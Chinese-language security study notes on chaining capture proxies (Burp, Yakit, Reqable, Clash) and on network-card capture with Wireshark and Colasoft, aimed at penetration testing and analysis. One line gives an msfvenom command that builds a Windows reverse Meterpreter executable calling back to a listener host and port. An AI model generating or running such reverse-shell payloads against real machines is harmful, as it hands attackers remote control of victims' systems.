Wireshark
科来网络分析系统(Colasoft)
抓包工具联动(代理链 + 转发)
- 意义:将同一请求/响应流水线化,让数据包依次经过不同的安全工具进行检测与处理,提升自动化与复测效率。
常见链路示例
Burp → Yakit
1. 启动 Burp:127.0.0.1:8080
2. 启动 Yakit:127.0.0.1:8083
3. 在 Burp 中设置下游代理转发到 Yakit(或使用操作系统代理指向 Burp)
4. 系统代理:127.0.0.1:8080
Yakit → Burp
1. 启动 Yakit:127.0.0.1:8083
2. 在 Yakit 中设置下游代理:127.0.0.1:8080
3. 启动 Burp:127.0.0.1:8080
4. 系统代理:127.0.0.1:8083
Burp → Yakit → Reqable
1. Burp: 127.0.0.1:8080
2. Yakit: 127.0.0.1:8083(下游指向 Reqable 或 Burp)
3. 系统代理指向:127.0.0.1:8080(Burp)
4. 在 Yakit 中设置下游:127.0.0.1:9000(Reqable)
科学上网与抓包(梯子场景)
- 组合:Clash + Burp / Clash + Yakit
- 用途:当目标资源需走代理(境外、被墙资源)时,通过本地代理链把流量走梯子并同时送入抓包链路。
- 要点:保证抓包代理在流量出口前或中间链路可见;注意代理顺序以防流量被直连或被梯子端拦截。
全局协议抓包(网卡级别)
- 工具:Wireshark、Colasoft(网卡抓包/被动监听)
- 适用场景:
- 当应用检测到系统代理并拒绝时,网卡抓包仍可获取流量(在代理之前抓包)。
- 某些应用/小程序不使用系统代理或使用自定义 socket,需网卡层面抓包。
- 原理提示:
- 代理路径:应用 → 代理 → 网卡(代理前流量不可见)
- 非代理路径:应用 → 网卡(抓包可见)
应用类型与抓包注意事项
- APP / 小程序 / PC 应用:不同应用的网络栈不同,抓包方式需区别对待。
- HTTPS 与代理:若应用启用证书固定(pinning)或自定义 TLS 实现,常规证书插入会失败;需结合动态分析/Frida 等手段。
- UDP/TCP 原生协议:部分服务使用 UDP(如QUIC、游戏/IoT),需开启相应协议解析与会话重组。
蓝队 / 渗透工具示例(Tcp/UDP 与 payload)
- msfvenom 示例(生成 Windows 反向 Meterpreter 可执行):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=6666 -f exe -o 9.exe
- 说明:生成的 payload 用于红队/渗透模拟测试;蓝队在网络流量中可用 Wireshark/IDS 策略检测异常连接与 C2 特征。
实用建议
- 优先在受控环境(实验室/测试网段)做联动抓包,避免影响生产。
- 组合使用网卡抓包与代理抓包:二者互补,前者在代理失效/被绕过时仍能捕获流量,后者适合 HTTP/HTTPS 深度分析。
- 对于需要科学上网的目标,确保代理链中抓包节点可见且不会被远端代理终止解密链路。
- 在链路联动时注意端口冲突、循环代理(loop)和请求延迟影响检测结果。
参考链接